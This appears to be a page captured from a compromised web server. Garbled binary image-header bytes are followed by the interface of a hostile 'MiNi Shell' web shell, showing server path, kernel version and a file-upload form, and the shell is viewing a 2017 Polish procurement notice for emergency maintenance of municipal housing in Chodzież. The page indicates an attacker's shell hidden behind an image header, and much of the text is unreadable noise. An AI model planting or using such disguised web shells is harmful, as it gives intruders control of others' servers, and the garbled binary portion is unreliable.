JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/17058_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-403><biuletyn>2017</biuletyn><pozycja>17058</pozycja><data_publikacji>2017-01-31</data_publikacji><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><czy_finansowane_z_unii /><nazwa_projektu_programu></nazwa_projektu_programu><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><nazwa>Mieszkaniowy Zasób Gminy Miejskiej Chodzież</nazwa><regon>30058050200000</regon><ulica>ul. Młyńska</ulica><nr_domu>3</nr_domu><nr_miesz></nr_miesz><miejscowosc>Chodzież</miejscowosc><kod_poczt>64800 </kod_poczt><wojewodztwo>wielkopolskie</wojewodztwo><panstwo></panstwo><email></email><tel>67 28 20 322</tel><fax>67 28 20 322</fax><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_internetowej_url>www.mzgmchodziez.naszaplacowka.pl </adres_strony_internetowej_url><regon>30058050200000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o udzieleniu zamówienia</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><czy_biul_pub>T</czy_biul_pub><biul_pub_poz>376858-2016</biul_pub_poz><czy_zmiana_ogl>N</czy_zmiana_ogl><zostalo_zamieszczone_ogloszenie_o_zmianie_pozycja></zostalo_zamieszczone_ogloszenie_o_zmianie_pozycja><dotyczy>1</dotyczy><rodzaj_zam>administracja samorządowa</rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><rodzaj_zam_inny></rodzaj_zam_inny><nrbiuletynu>1</nrbiuletynu><nrpozycji>376858-2016</nrpozycji><datawydaniabiuletynu></datawydaniabiuletynu><nazwa_zamowienia>Prowadzenie całodobowego Pogotowia Technicznego w branży sanitarnej i elektrycznej w lokalach i budynkach stanowiących mienie Gminy Miejskiej w Chodzieży zarządzanych przez Mieszkaniowy Zasób Gminy Miejskiej Chodzież</nazwa_zamowienia><numer_referencyjny>SA.271.29.2016</numer_referencyjny><rodz_zam>U</rodz_zam><przedmiot_zam>1. Przedmiotem zamówienia jest wykonanie usług prowadzenia całodobowego
Pogotowia Technicznego w branży sanitarnej i elektrycznej w lokalach i budynkach stanowiących mienie Gminy Miejskiej w Chodzieży zarządzanych przez Mieszkaniowy Zasób Gminy Miejskiej Chodzież, polegających na usuwaniu i zabezpieczaniu awarii instalacji wodno-kanalizacyjnej, centralnego ogrzewania, ciepłej wody, instalacji gazowej i elektrycznej
oraz usług w zakresie konserwacji w/wym. instalacji. Szczegółowy zakres czynności Pogotowia Technicznego określono w III pkt. 8 SIWZ. 2. „Formularzu kalkulacji cenowej” zostały wyszczególnione orientacyjne ilości roboczogodzin usług w budynkach mieszkalnych i usługowych w skali rocznej w oparciu o analizę potrzeb Zamawiającego. Zestawienie to
stanowi podstawę do wyliczenia ceny. Zamawiający nie jest zobowiązany do zrealizowania w 100% podanych ilości roboczogodzin. 3. Przez awarie Zamawiający rozumie - nagłe, niezamierzone uszkodzenie elementu budynku, instalacji lub urządzenia technicznego, powodujące jego niewłaściwe działanie lub całkowite unieruchomienie, mogące spowodować zagrożenie bezpieczeństwa użytkowników obiektu budowlanego (budynku lub obiektu małej
architektury) oraz narazić właścicieli lub najemców na straty materialne. Przez roboty awaryjne – (usuwanie awarii) Zamawiający rozumie – czynności podejmowane przez Wykonawcę polegające na usuwaniu przyczyn i skutków awarii. 4. Przez usługi konserwacji Zamawiający rozumie - czynności polegające na wykonywaniu drobnych napraw i remontów (również skutków awarii) poszczególnych elementów budynków niezbędnych do utrzymania
obiektu budowlanego i jego otoczenia w należytym stanie technicznym, obejmujące likwidację przyczyn mogących spowodować przedwczesne niszczenie obiektu lub jego elementów i urządzeń 5. Wykaz adresowy budynków i lokali będących własnością Gminy Miejskiej w Chodzieży zarządzanych przez Mieszkaniowy Zasób Gminy Miejskiej Chodzież, na których będzie realizowany przedmiot zamówienia określa załącznik nr 9 do SIWZ. 6.Wykonawca oświadcza, że zapoznał się z warunkami realizacji niniejszego zamówienia oraz miejscem wykonywania przedmiotu umowy i nie wnosi do nich uwag. 7. Szczegółowy zakres czynności do wykonania przez Wykonawcę: 1. [USUWANIE AWARII] Czynności pogotowia technicznego w zakresie usuwania awarii polegają na przybyciu na miejsce awarii, ustaleniu jej przyczyny, zabezpieczeniu skutków awarii celem uniknięcia nadmiernych szkód w nieruchomościach, określeniu zakresu rzeczowego usunięcia awarii
oraz usunięciu drobnych awarii w zakresie branży elektrycznej, wodno-kanalizacyjnej,centralnego ogrzewania i gazowej w szczególności: 1) Instalacja elektryczna - czynności obejmują usuwanie awaryjnego braku dopływu prądu do mieszkań, lokali użytkowych, pomieszczeń wspólnego użytku klatek schodowych, piwnic, strychów i innych, w tym: a)ustalenie przyczyny zaniku napięcia (dostawy prądu), b) usuwanie awarii pod tablicą
licznikową oraz na zaciskach śrubowych wejścia i wyjścia gniazda bezpiecznikowego zabezpieczenia przedlicznikowego, a) naprawa połączeń zatablicowych, usuwanie przerw w dopływie prądu lub w oświetleniu administracyjnym, b) naprawa i regulowanie automatów oświetleniowych schodowych i ograniczników mocy, c) wymiana lub uzupełnienie żarówek
w oprawach żarowych na klatkach schodowych, piwnicach oraz w pomieszczeniach wspólnego użytku, d) mocowanie wiszących przewodów elektrycznych i teletechnicznych do 10 mb, e) wymiana upalonych końcówek na przewodach elektrycznych obwodów administracyjnych w przypadku awarii, f) zabezpieczenie miejsc po wyrwanych kasetach domofonowych, g) montaż tymczasowej instalacji elektrycznej w celu zapewnienia oświetlenia administracyjnego w przypadku jego awarii do 5m /mies. h) naprawa lamp,
wyłączników, przycisków oświetleniowych w pomieszczeniach wspólnych i na klatkach schodowych, i) wymiana i uzupełnienie dekli w puszkach elektrycznych do 5 szt/mies. j)dokręcanie przewodów, czyszczenie styków, zaizolowanie przewodów przy awariach, k)
usuwanie przerw w dopływie prądu (np. upalone przewody) – do 10 m. l) wymiana
bezpieczników i gniazd bezpiecznikowych w tablicach administracyjnych danego
budynku, m) kontrola stanu plomb na urządzeniach kontrolno-pomiarowych w
nieruchomościach (liczniki administracyjne), n) inne roboty o podobnym charakterze nie
wykraczające poza zakres awarii. 2) Instalacja wodno-kanalizacyjna i c.o. w budynku: a)
likwidacja lub zabezpieczenie na części wspólnej miejscowych przecieków instalacji
wodnej i kanalizacyjnej wraz z przykanalikiem (do pierwszej studni rewizyjnej na sieci
głównej), b) likwidacja lub zabezpieczenie miejscowych przecieków przyborów
zainstalowanych w pomieszczeniach wspólnego użytkowania, c) udrażnianie i
przeczyszczenie pionów i poziomów kanalizacyjnych w budynku do pierwszej studni
rewizyjnej na zewnątrz, z wyjątkiem syfonów i kratek ściekowych w lokalach
mieszkalnych i użytkowych, czyszczenie kratek ściekowych w pomieszczeniach
wspólnego użytku, d) wymiana zaworów na instalacji wodociągowej na poziomach i
pionach, e) odmrażanie instalacji, f) kontrola i ustalenie przyczyny przecieków w lokalach
mieszkalnych i użytkowych, g) zabezpieczenie studzienek kanalizacyjnych w przypadku
kradzieży pokryw poprzez wygrodzenie taśmą ostrzegawczą i zabezpieczenie otworu w
sposób uniemożliwiający wpadnięcie do otworu studzienki (np. poprzez założenie
pokrywy betonowej) oraz niezwłoczne założenie właściwej pokrywy na studzienkę, h)
udrażnianie i przeczyszczenie kanalizacji deszczowej poprzez czyszczenie rury
deszczowej z osadnikiem i czyszczakiem, i) udrażnianie i czyszczenie kanalizacji
sanitarnej wraz z czyszczakiem i syfonem, j) usunięcie przecieków na wewnętrznej
instalacji c.o. wewnątrz budynków, k) inne roboty o podobnym charakterze nie
wykraczające poza zakres awarii. 3) Instalacja gazowa w budynku: a) niezwłoczne
reagowanie na zgłoszenie awarii, b) ustalenie miejsca rozszczelnienia instalacji gazowej,
c) niezwłoczne zgłoszenie awarii do pogotowia gazowego, w przypadku nieszczelności
gazomierza, d) sprawdzenie miejsca wycieku i zamknięcie dopływu gazu przed
odbiornikiem lub przy gazomierzu, w przypadku zgłoszenia ulatniania się gazu w
mieszkaniu, e) likwidacja przecieku gazu na instalacji do zaworu odcinającego przed
urządzeniem gazowym w lokalu, f) przeprowadzanie prób szczelności po każdej naprawie
oraz sporządzenie protokołów prób szczelności, g) inne roboty o podobnym charakterze
nie wykraczające poza zakres awarii. 4) Zastępcze wykonanie w imieniu Zamawiającego
prac obciążających lokatora a przez niego zaniechanych (napraw i konserwacji, o których
mowa w art. 6b ust. 2 pkt 4,5,7,8 ustawy z dnia 21 czerwca 2001 r. o ochronie praw lokatorów, mieszkaniowym zasobie gminy i o zmianie Kodeksu cywilnego) w zakresie
niezbędnym do usunięcia awarii. 2. [USŁUGI KONSERWACJI] Usługi konserwacyjne
realizowane w ramach Pogotowia Technicznego obejmują całokształt czynności i prac
mających zapewnić właściwy stan techniczny instalacji budynku. Typowe czynności w
poszczególnych branżach są następujące: 1) Instalacja elektryczna (konserwacji podlega
wewnętrzne zasilanie w energię od złącza kablowego dostawcy energii do odbiornika w
lokalach mieszkalnych, a w lokalach użytkowych do licznika): a) wymiana przewodów
instalacji oświetlenia administracyjnego w ilości związanej z trzema punktami
świetlnymi, b) utrzymanie skrzynek elektrycznych piętrowych i głównych w czystości,
c) sprawdzanie umocowania przewodów elektrycznych, d) wyszukiwanie przerw i
zwarć w instalacji elektrycznej oraz usuwanie uszkodzeń w instalacji odgromowej
budynku bez wymiany poszczególnych elementów, e) wymiana gniazd
bezpiecznikowych wraz z oprzewodowaniem i elementami łączeniowymi w tablicach
rozdzielczych WLZ oraz administracyjnych, f) konserwacja tablicy wnękowej z
licznikami energii elektrycznej należącym do mieszkańców, g) wymiana lamp,
uzupełnienie brakujących kloszy, wymiana wyłączników, przycisków oświetleniowych
w pomieszczeniach wspólnego użytkowania i na klatkach schodowych, h) wymiana
automatów na klatkach schodowych, i) wymiana gniazd bezpiecznikowych w obwodzie
administracyjnym danego budynku, j) wymiana zabezpieczeń nadmiarowo-prądowych i
przeciwporażeniowych w obwodzie, k) wymiana upalonych końcówek w obwodzie
administracyjnym danego budynku, l) naprawa lub wymiana automatów oświetlenia na
klatkach schodowych, m) dbałość o stan techniczny i stosowne zabezpieczenie osłon
liczników elektrycznych, n) wymiana kaset rozmownych domofonowych, wymiana
zasilaczy domofonowych, o) wymiana elektrozamków w drzwiach wejściowych, p)
wymiana oprawek do lamp, starterów do lamp, gniazd do świetlówek, gniazd do
starterów, q) naprawa lub uzupełnienie drzwiczek do skrzynek elektrycznych na
klatkach schodowych, r) usuwanie zbędnych połączeń z instalacji administracyjnych, po
wskazaniu miejsca ich lokalizacji, s) wymiana bezpieczników i główek
bezpiecznikowych, śrub stykowych, wkładek bezpiecznikowych topikowych w
tablicach administracyjnych danego budynku oraz w tablicy głównej i tablicach
piętrowych, t) wymiana przycisków, wyłączników instalacyjnych, gniazd wtyczkowych,
zasilanych z tablic administracyjnych, u) ustawianie oraz regulacja zegarów sterujących
oświetleniem klatek schodowych, v) konserwacja i naprawa instalacji oświetleniowej na
zewnątrz budynku, w) wymiana pierścieni łączeniowych w puszkach, x) wymiana lamp oświetleniowych w ilości niezbędnej do prawidłowego oświetlenia części wspólnych,
y) wymiana listew rozgałęźnych w pomieszczeniach wspólnego użytku, z) wykonanie
badań ochronnych i pomiarów instalacji elektrycznej, aa) wymiana przewodów,
osprzętu i zabezpieczeń instalacji elektrycznej w lokalach przeznaczonych do
ponownego zasiedlenia (pustostanach), bb) wykonywanie innych robót o podobnym
charakterze, wyżej nie wymienionych. 2) Instalacja wodno-kanalizacyjna: a)
usuwanie nieszczelności zaworów przelotowych i odcinających w poziomach,
pionach w budynkach i lokalach poprzez: wymianę uszczelek zaworów, wymianę
głowic zaworów oraz wymianę kompletnych zaworów, b) czynności podejmowane w
związku z występującą korozją: założenie opasek uszczelniających, wymianę rur i
łączników instalacji, izolacji itp., c) wymiana i naprawa urządzeń i zaworów
czerpalnych w pomieszczeniach wspólnych oraz lokalach do ponownego zasiedlenia
(pustostanach), d) wymiana i montaż wodomierzy, pomp pływakowych, e) likwidacja
przecieków instalacji kanalizacyjnej poprzez: wymianę lub uzupełnienie uszczelek w
kielichach pionów i poziomów, zakładanie opasek uszczelniających, a) uzupełnienie
lub wymiana dekli rewizyjnych, kratek ściekowych lub pokryw na instalacji
kanalizacyjnej, b) wymiana podejścia odpływowego bez względu na rodzaj materiału
i sposób uszczelniania, c) wymiana pionów i odcinków rur kanalizacyjnych, d)
czyszczenie, naprawa, montaż studzienek kanalizacyjnych, założenie właściwej
pokrywy na studzienki kanalizacyjne i wpusty burzowe itp., e) uszczelnianie,
likwidacja osadników, f) demontaż i montaż elementów osłaniających instalację
kanalizacyjną wymaganych do usunięcia awarii, g) przepychanie i czyszczenie rur
kanalizacyjnych oraz usunięcie zanieczyszczeń powstałych w wyniku awarii
kanalizacyjnej, h) zamurowanie i otynkowanie otworów w ścianach i sufitach po
robotach instalacyjnych, i) wymiana urządzeń we wspólnych ubikacjach, montaż
urządzeń w lokalach do ponownego zasiedlenia (pustostanach), j) wykonywanie
innych robót o podobnym charakterze, wyżej nie wymienionych. 3) Instalacja gazowa
w budynku - czynności obejmują utrzymanie w pełnej sprawności technicznej
wewnętrznej instalacji gazowej w budynku od zaworu głównego do urządzeń
odbiorczych ( łącznie z urządzeniami), wymiana łączników, wymiana odcinków rur
itp. .: a) usuwanie nieszczelności, wymiana kurków gazowych przy urządzeniach i za
gazomierzem, b) odłączanie urządzeń gazowych od instalacji w przypadkach
koniecznych przy wymianie rur wod. – kan., c.o. itp., c) podłączenie urządzeń
gazowych po wykonanych robotach, d) sprawdzenie przejść przewodów gazowych przez zewnętrzne ściany budynku, e) sprawdzenie stężenia gazu we wnękach
gazomierzy, w szczególności połączeń i stanu gazomierzy, f) sporządzenie
protokołu z przeprowadzonych prób szczelności, g) konserwacja i naprawa szafek
gazowych lub ich wymiana, h) w razie konieczności odcięcie i zaspawanie
podejścia pod urządzenie gazowe zamontowane przez najemcę bez zgody
wynajmującego, i) montaż urządzeń (kuchenek gazowych) w lokalach
przeznaczonych do ponownego zasiedlenia, j) zamurowanie i otynkowanie
otworów w ścianach i sufitach po robotach instalacyjnych, k) wykonywanie innych
robót podobnym charakterze, wyżej nie wymienionych. 4) Instalacja centralnego
ogrzewania (prace dotyczą instalacji wewnętrznej od zaworów progowych w węźle
cieplnym, gdy węzeł eksploatowany jest przez Zamawiającego, oraz od zaworów
gdy węzeł cieplny jest eksploatowany przez MEC) : a) usunięcie przecieków na
wewnętrznej instalacji c.o. wewnątrz budynków, b) montaż pieców gazowych
jedno i dwufunkcyjnych, c) wymiana grzejników, d) montaż wkładów kominowych
i nasad w przypadku ich braku, e) regulacja instalacji cyrkulacyjnej ciepłej wody
użytkowej, wymiana pomp cyrkulacyjnych, f) przeprowadzanie przeglądów
instalacji przed i po sezonie grzewczym, g) sprawdzenie raz w roku term, pieców
jedno i dwufunkcyjnych, pod kierunkiem czy lokatorzy posiadają protokół z
czyszczenia i konserwacji tych urządzeń. h) wykonywanie innych robót podobnym
charakterze, wyżej nie wymienionych. 5) Obsługa kotłowni dla budynków Siejaka
25A i Siejaka 25B: 6) Inne roboty na urządzeniach i instalacjach elektrycznych i
sanitarnych wykraczające poza ww. zakres realizowane na podstawie szczegółowo
określonych zleceń. 3. Pozostałe czynności: 1) Zgłaszanie Zamawiającemu: a)
każdej awarii na w/wym. instalacjach, b) o wykrytych samowolnych przeróbkach
instalacji elektrycznej w lokalach lub pomieszczeniach gospodarczych; c) o
zauważonych nieprawidłowościach w funkcjonowaniu instalacji i urządzeń
elektrycznych, wodno-kanalizacyjnych, gazowych i c.o, w tym w wyniku
nieuprawnionych działań najemców, d) o zastępczym wykonaniu w imieniu
Zamawiającego prac obciążających lokatora w zakresie napraw i konserwacji, o
których mowa w art. 6b ust.2 ustawy z dnia 21 czerwca 2001r. o ochronie praw
lokatorów, mieszkaniowym zasobie gminy i o zmianie Kodeksu cywilnego.
Odnotowanie w prowadzonym przez Wykonawcę (dyspozytora pogotowia
technicznego) rejestrze zgłoszeń, informacji o awarii m.in. daty przyjęcia
zgłoszenia, daty usunięcia, miejsca awarii itp. 8. Pogotowie Techniczne, o którym mowa w III SIWZ, w zakresie awarii działa na podstawie zgłoszeń
telefonicznych: w dni robocze w godzinach od 7.00 do 15.00 - pracowników
Mieszkaniowego Zasobu Gminy Miejskiej Chodzież lub najemców
(mieszkańców) lokali w budynkach objętych umową, w dni robocze w
godzinach od 15.00 do 7.00 rano dnia następnego oraz w dni świąteczne i dni
wolne od pracy całodobowo - najemców (mieszkańców) lokali w budynkach
objętych umową. 9. Pogotowie Techniczne, o którym mowa w III SIWZ,
podejmie działania zabezpieczające niezwłocznie po powzięciu wiadomości o
zaistnieniu awarii. Obowiązkiem Wykonawcy w takiej sytuacji jest przyjazd pod
wskazany adres w ciągu 0,5 godziny od telefonicznego zgłoszenia awarii,
niezwłoczne zabezpieczenie jej przed rozszerzeniem oraz usunięcie jej skutków i
przywrócenie do stanu pierwotnego. Interwencja dotycząca nieszczelności gazu
jest podejmowana natychmiast po otrzymaniu zgłoszenia, a w przypadku braku
możliwości usunięcia awarii Wykonawca przekaże zgłoszenie do Pogotowia
Gazowego. 10. Pogotowie Techniczne w zakresie prac konserwacyjnych
(naprawczych, remontów i usuwania skutków awarii) działa na podstawie
pisemnych zleceń Zamawiającego, którego wzór stanowi załącznik nr 2 do
umowy. 11. Dyspozytor Pogotowia Technicznego zobowiązany jest utrzymywać
telefoniczny kontakt z Mieszkaniowym Zasobem Gminy Miejskiej Chodzież;
dnia następnego (roboczego) do godz. 9.00 zobowiązany jest do przekazania
informacji o ważnych awariach zgłoszonych w czasie dyżuru. 12. Wykonawca
zobowiązany jest do odbioru pisemnego zlecenia (na wykonanie usług
konserwacji) w siedzibie Zamawiającego, po otrzymaniu telefonicznego
zgłoszenia. Zamawiający może również przekazywać zlecenia pocztą
elektroniczną lub faksem. 13. Wykonawca musi podjąć realizację zlecenia w
ciągu 2 dni roboczych chyba, że strony zakreślą inny termin w zleceniu. W razie
potrzeby (po awariach) Wykonawca zobowiązany jest do rozpoczęcia działań
związanych z wykonaniem prac w ciągu 3 godzin od otrzymania zlecenia oraz
do wykonania najpilniejszych prac w dniu zgłoszenia. 14. Wykonawca
zobowiązany jest do posiadania i używania przez cały czas realizacji umowy
oraz posiadania poczty elektronicznej (adres e-mail) i (lub) sprawnego
urządzenia faksującego. W przypadku przekazywania zlecenia faksem lub
pocztą elektroniczną Wykonawca zobowiązany jest do potwierdzenia
Zamawiającemu faktu przyjęcia zlecenia tą samą drogą. W przypadku uchylania się Wykonawcy od obowiązku przekazania takiego potwierdzenia,
Zamawiający przyjmie za wystarczające do uznania, że zlecenie Wykonawca
otrzymał (dowód przekazania e-maila lub faksu na numer podany przez
Wykonawcę w ofercie). 15. Jeżeli w czasie wykonywania przedmiotu umowy
Wykonawca stwierdzi konieczność wykonania prac nie wymienionych w
zleceniu, w ilości większej niż określona w zleceniu lub użycia materiałów
innych niż określone w zleceniu, Wykonawca jest zobowiązany niezwłocznie
powiadomić kierownika ds. remontowych MZGM, celem uzyskania pisemnej
akceptacji na wykonanie zwiększonego zakresu prac. 16. Zamawiający
zastrzega sobie, że prace wykonane, które nie zostały zgłoszone przez
Wykonawcę, a także nie uzyskały pisemnej akceptacji kierownika ds.
technicznych MZGM, nie będą uwzględnione w rozliczeniu finansowym. 17.
Do obowiązków Pogotowia Technicznego należy również: 1) podanie: a)
numerów telefonów, pod które będą zgłaszane awarie przez mieszkańców oraz
Zamawiający będzie mógł zostawić wiadomość w przypadku wystąpienia
robót wymagających natychmiastowego przystąpienia do ich wykonania oraz
pozostawienia wiadomości o zleceniach do odbioru. b) adresu poczty
elektronicznej lub numeru faksu właściwych do przekazania zleceń 2)
wywieszenia informacji o numerach telefonów zgłoszeniowych na tablicach
informacyjnych na klatkach schodowych i w siedzibie MZGM oraz wyrażenia
zgody na zamieszczenie powyższych numerów na stronie internetowej
Zamawiającego. 3) przygotowania identyfikatorów dla pracowników
bezpośrednio świadczących usługę i przedstawiania ich do uwiarygodnienia
przez Zamawiającego. 4) prowadzenie książki zgłoszeń awarii, w której
dokonywał będzie adnotacji dotyczącej adresu, rodzaju awarii, sposobu jej
usunięcia, którą Wykonawca przekazuje do MZGM w ciągu 7 dni po
zakończeniu miesiąca. 18. Zamawiający ma prawo kontroli sposobu i jakości
wykonanych usług oraz wydawania doraźnych poleceń osobom bezpośrednio
zatrudnionym przy realizacji przedmiotu umowy co do sposobu, kolejności i
czasu wykonywanych zadań. Zamawiający ma obowiązek bez zbędnej zwłoki
dokonać odbioru robót określonych zleceniem oraz sprawdzić powykonawcze
kosztorysy szczegółowe dostarczone przez Wykonawcę. 19. Wykonawca
zobowiązany jest do wykonania robót budowlanych zgodnie ze sztuką
budowlaną, zasadami wiedzy technicznej, warunkami technicznymi wykonania i odbioru robót budowlano – montażowych, obowiązującymi
przepisami i normami oraz przy zachowaniu przepisów p-poż, BHP,
Ochrony Środowiska i o odpadach, przy maksymalnym ograniczaniu
uciążliwości prowadzenia robót u Zamawiającego, przy dołożeniu należytej
staranności. 20. Wykonawca zobowiązuje się wszystkie usługi zlecone
przez Zamawiającego wykonać z własnych materiałów z wyjątkiem
określonym w projekcie umowy, przy użyciu własnego (lub wynajętego)
sprzętu. 21. Wykonawca zapewnia materiały i urządzenia niezbędne do
wykonania przedmiotu umowy dopuszczone do obrotu i stosowania w
budownictwie, posiadające odpowiednie aprobaty, certyfikaty i atesty
pozwalające na ich stosowanie. Transport materiałów na miejsce ich
wbudowania (wykonania zlecenia) oraz dostarczenie i eksploatacja maszyn
i urządzeń niezbędnych do prawidłowego wykonania zamówienia obciąża
Wykonawcę. 22. Wykonawca zobowiązany jest do zapewniania we
własnym zakresie wywozu i utylizacji odpadów (śmieci, gruzu, papy,
sprzętu elektrycznego i elektronicznego itp.) zgodnie z przepisami ustawy o
odpadach, o sprzęcie elektrycznym i elektronicznym oraz
udokumentowanie tych czynności na żądanie Zamawiającego. 23.
Wykonawca ma obowiązek stosowania się do poleceń wyznaczonych
przedstawicieli Zamawiającego. 24. Wykonawca gwarantuje zatrudnienie
przy realizacji usługi pracowników z odpowiednimi uprawnieniami. 25.
Wykonawca nie może zlecić wykonania całości lub części prac określonych
w umowie, osobie trzeciej bez zgody Zamawiającego wyrażonej na piśmie.
26. Realizując umowę Wykonawca obowiązany jest reprezentować wobec
lokatorów obsługiwanych budynków i lokali, interes Zamawiającego a w
szczególności swoją postawą i działaniem tworzyć pozytywny wizerunek
Zamawiającego. 27. Wykonawca ponosi pełną odpowiedzialność za szkody
wynikłe wobec osób trzecich lub za zniszczenie mienia, w związku z
wykonywaniem przedmiotu umowy. 28. Wykonawca zobowiązuje się
wszystkie usługi zlecone przez Zamawiającego wykonać siłami własnymi /i
przy pomocy podwykonawców w zakresie określonym w formularzu oferty
– załącznik nr 1 do SIWZ/. 29. Wykonawca odpowiada za działanie i
zaniechanie podwykonawców jak za działanie lub zaniechanie własne. 30.
Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę w trakcie realizacji zamówienia pn.
„Prowadzenie całodobowego Pogotowia Technicznego w branży
sanitarnej i elektrycznej w lokalach i budynkach stanowiących mienie
Gminy Miejskiej w Chodzieży zarządzanych przez Mieszkaniowy Zasób
Gminy Miejskiej Chodzież", osób wykonujących czynności: a)
pracownicy wykonujący konserwacje instalacji wod. – kan., C.o., gaz, b)
pracownicy wykonujący konserwacje w zakresie instalacji elektrycznej.
31. W trakcie realizacji zamówienia zamawiający uprawniony jest do
